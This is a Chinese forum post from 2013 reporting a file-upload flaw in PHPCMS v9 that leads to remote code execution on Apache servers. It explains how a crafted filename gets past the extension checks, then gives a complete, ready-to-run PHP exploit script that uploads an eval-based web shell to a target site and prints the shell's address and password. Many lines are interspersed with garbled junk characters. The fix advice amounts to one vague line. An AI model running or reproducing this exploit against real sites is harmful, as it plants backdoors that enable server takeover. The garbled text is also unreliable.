漏洞类型: 文件上传导致任意代码执行
, Y8 z% @5 S" y
9 n4 p5 @1 E1 T简要描述:
" y9 c- l7 K; M" Q
& D+ X; O: c6 z, gphpcms v9 getshell (apache)
! | H% s+ r5 g, r1 W详细说明:0 l9 q) z1 j; I3 T: `- { v
* l+ H8 n: k! u4 d9 c
漏洞文件:phpcms\modules\attachment\attachments.php
. m7 y: C2 R3 m$ e: e' W4 k5 M
( o& T0 U( S' T4 O3 q, Dpublic function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } }
+ p1 h$ q' H! [% T: |后缀检测:phpcms\modules\attachment\functions\global.func.php
* I3 f* J% `8 o9 J J& u8 h0 d6 Z& O
2 r% q# T; Q1 A* q* J& h
; R) m4 b# D0 K; d2 x2 ^) z% O" Ufunction is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; }
" H p! W1 U9 u4 ]+ M* S2 ?* i0 e& I+ T }, w L" _
关键函数:
6 A9 [/ d0 |$ r/ \( d2 j# E5 S; Z# z' l; `* d
7 c3 I9 D9 u5 [: C$ S& n X( w2 Q5 Y, q: k+ N# h7 p2 ~( o8 p
function fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); } % F) X% _ R) f. p# c& v
3 c& ~% z4 V; q- X Fileext函数是对文件后缀名的提取。
- O+ ^; {& V: M1 ?1 w" Y根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php$ c( r1 Y; o1 v3 g
经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。9 w2 k- i R/ v
我们回到public function crop_upload() 函数中# M. |1 E& a% P1 g
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();- u, o! \3 V% T" x
在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数4 P* \$ M* X- ~/ E! _: z7 _
这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。) A2 \! u" I8 R# t
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
: o m/ L r" \+ @最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。 a, o. Z1 \* |+ I3 H- m4 f c
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。
. Z( }3 X/ r Q8 v+ y" {; y漏洞证明:
+ P1 E) \$ L7 y; ^/ U5 z; u" t6 J' C$ [: s; n
exp:
2 }; a4 y8 X; N+ A& Z
5 o5 }% [% z! J' h6 @0 a3 I<?php
" a% |- I3 k/ k( {3 J" jerror_reporting(E_ERROR);- k; N5 G% P8 y
set_time_limit(0);: h9 w8 X! V) C5 ^2 E
$pass="ln";
* s" N. b) p [2 H! ?, O7 X1 R2 @1 Mprint_r('7 Q" J! i* R! m) |$ r4 w
+---------------------------------------------------------------------------+
* I( e5 D& n' X9 L. S/ x8 kPHPCms V9 GETSHELL 0DAY ( b' o; r0 B! C0 U- w
code by L.N.
* f# a( T ]' J5 E/ F5 V
9 S" k" b0 f6 _* k" |) Bapache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
2 V0 C( J5 d; _4 M3 k; I+---------------------------------------------------------------------------+
% Q1 U: |; i+ K' ~0 y5 i+ F F');
. |, t# D- I rif ($argc < 2) {
+ ~! Y0 A7 e; t) b% xprint_r('
+ {0 b" O8 }5 \8 x& y0 D. l+---------------------------------------------------------------------------+, W$ a" A# w/ q" g4 b
Usage: php '.$argv[0].' url path1 B0 v$ L% p- c7 f. _1 N
; g, x/ Y/ [. t: W+ H. n' OExample:' i H/ F3 a" `% o5 q
1.php '.$argv[0].' lanu.sinaapp.com
6 @* V0 J- ~& G2.php '.$argv[0].' lanu.sinaapp.com /phpcms* d- r! E' q+ h7 B( U
+---------------------------------------------------------------------------+5 x/ B4 @2 R8 G% R+ s& W6 G% V
');
4 S$ s9 Q3 ~8 S. I! p' ^exit;, [ @ {6 R: t- d! t* `
}
7 B& [3 u6 U; T+ V$ D$ }
$ W7 _( M8 v# U, ^$url = $argv[1];
/ j' m/ D) {% J2 M$ v$path = $argv[2];3 m- X# {+ [5 w3 A* Y
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';* y' n8 c8 h- L p
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
' |9 v5 J# x1 c0 E; x* Gif($ret=Create_dir($url,$path)). t9 H- ~# f- M4 L) g5 Q' X+ _$ D% D
{8 C9 c( S; @; x8 _1 ~! _
//echo $ret;% P% J* F" V- N8 a
$pattern = "|Server:[^,]+?|U";5 K# a! w+ L: d$ ~: L3 s1 w& q5 d' E) D
preg_match_all($pattern, $ret, $matches);2 E" R* F) Z% j& f5 P2 A
if($matches[0][0])+ S7 f* W% Y0 \; H8 ], H+ }
{0 I- ]. O: S* s1 v7 ^$ h( y
if(strpos($matches[0][0],'Apache') == false)
f$ d/ z7 p% n1 p3 C1 n{. i) W) y- x" y" b) u3 \0 Q
echo "\n亲!此网站不是apache的网站。\n";exit;
& u* M4 x1 {: u}
! J( B. S3 A- z2 B s! z# C}
2 D) B" a( y6 o T' t. n7 ~$ret = GetShell($url,$phpshell,$path,$file);+ H. _" ]8 S* @, }6 @& _# [7 Q
$pattern = "|http:\/\/[^,]+?\.,?|U";5 Z1 N7 Z* D! @. F' F0 ?% b5 @5 Z
preg_match_all($pattern, $ret, $matches);! m! x( A* I( e3 v& y& b- s5 J
if($matches[0][0])
( A9 \/ s4 H; C{# v# n" g( |9 t7 C" q( W7 W, V
echo "\n".'密码为: '.$pass."\n";* Z8 B& D8 @# q2 |' [$ @
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
4 Y1 A& r' C1 A7 k2 [- h4 l}
. z0 D6 {8 R; S2 {else
2 I ~, e3 F3 h! A{# \: ~5 M6 w# R, ?, f4 C) l& I9 |- q4 R
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
+ S; @( A7 a5 C: R' hpreg_match_all($pattern, $ret, $matches);; t$ m# Y% K- T
if($matches[0][0])
4 X8 t3 V' m- h' M8 a4 d! Y{" `" ?) g- A- b; J! A
echo "\n".'密码为: '.$pass."\n";% b7 N( e1 b9 q- n" L
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;) `% \7 `6 q9 w9 ?9 b3 H
}
1 S; G- T& r0 e2 w/ M& B2 Relse
! s/ k4 R* E; E! C; T- z6 B{
/ Z/ C0 i+ e9 J5 F. j7 g ]! Cecho "\r\n没得到!\n";exit;
- ^1 }' K7 K% p/ O4 y* V}) A! Q: D% z5 G& q% |3 O
}; T! }* [. |* v5 z! c4 c" _, w5 {
}0 P1 X q. T% x$ R0 K4 o, }
2 X1 t5 r1 B$ _
function GetShell($url,$shell,$path,$js)0 b5 O/ f# d2 O- n
{2 d) k+ ^* z, u( ?) Z
$content =$shell;( L" l: Q8 q( O9 B& e2 \: `
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
' v3 o" P4 |/ `% m! r- x$data .= "Host: ".$url."\r\n";1 f0 q6 b& L+ j
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";5 J& o/ [! n# t: ~
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
. M& t, P. |0 W3 r& h2 x" v$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";! ~7 B; }# d2 H* c1 ^ n2 D
$data .= "Connection: close\r\n";( x3 e4 U& b* P4 [% z( _4 N& g
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";, H) B4 ^! {/ U- t9 d5 n
$data .= $content."\r\n";1 `" R% g3 z! ]8 }2 I
$ock=fsockopen($url,80);
7 S# T+ p* Z, n. }- M2 Tif (!$ock)+ `5 ~3 p7 `. f( u( u( s; `
{
; W1 W# \9 g% P* T$ T( S0 Eecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;# U, z: V q, I& c" |
}- C6 Q! @3 @$ w& c: Y
else
' k/ S( p% G& ?6 p+ @9 R- B{
% e4 I( B9 D xfwrite($ock,$data);
' ]' q+ w! }9 m6 B0 G$resp = '';- z2 `) O' _0 y# d$ }# @
while (!feof($ock)): |1 [, h5 _0 O8 n% e/ z
{( G% Z# c& @) c- j/ M1 Q
$resp.=fread($ock, 1024);7 r& ]& P% v3 ~7 g
}
! b$ J; L R% x9 p5 y+ r+ F) |% [" v9 K* wreturn $resp;0 D5 L! h4 ~. p o$ x
}# b+ K, S( H2 f7 V3 E( J
}
3 t5 D+ d X$ @# A3 c# _' F+ g( ~0 J/ N: B9 b
function Create_dir($url,$path='')7 q# e9 ~7 A, F1 r& |1 H. w/ P0 F% k
{
/ b1 q! r8 e" Q$ D! t5 z$content ='I love you';3 L) W$ }& C/ P. ^" N" Q) C' Y
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";; l( p1 G; e/ n/ s! O) H
$data .= "Host: ".$url."\r\n";: ^8 h. `; ^" n1 n, Q
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";: I6 p( c/ B J. S+ |
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ h0 s P5 d/ F3 n* E$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$ C! }6 R3 l+ V* p X: m. t& {0 |: L$data .= "Connection: close\r\n";
: b+ n. J) \# N$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
! P! I0 I" D: ? G5 c$data .= $content."\r\n";
# d# `' [6 D0 v; z5 v* ~$ock=fsockopen($url,80);8 x8 v8 Q6 e" j+ S Y
if (!$ock)& U: g: _7 M1 I* @
{3 w/ o/ Q! n. w( c4 A" ]
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;5 i* n9 u4 p1 ~$ u
}/ o! z% x3 k; K0 n) F0 A- M
fwrite($ock,$data);* L) f6 x5 l$ Y: ]! e0 X: l
$resp = '';+ ]7 d E Z8 B
while (!feof($ock))
' z; V s) S* R) T& s8 L* z{
# P5 s1 _- s/ r& d$resp.=fread($ock, 1024);
- y+ R6 L8 _! N y: G4 @}- C- S1 d+ i% e, E6 ?& E% j
return $resp;5 p4 A$ f t n0 ^7 V
}
" f+ [) [# `) Q$ s& R?> + F: S: k7 a7 R6 y+ l
5 C4 b* V+ x& D
修复方案:
3 g3 p/ m8 W2 v8 s* c6 I/ H+ Z
# [# j' W3 @8 V. j% z2 n! U% X过滤过滤再过滤
3 Y: R" [$ v( z* q. K
! Z% J% h. y; n1 e) f! ] |
发表于 2013-3-7 13:06:41
收藏
支持
反对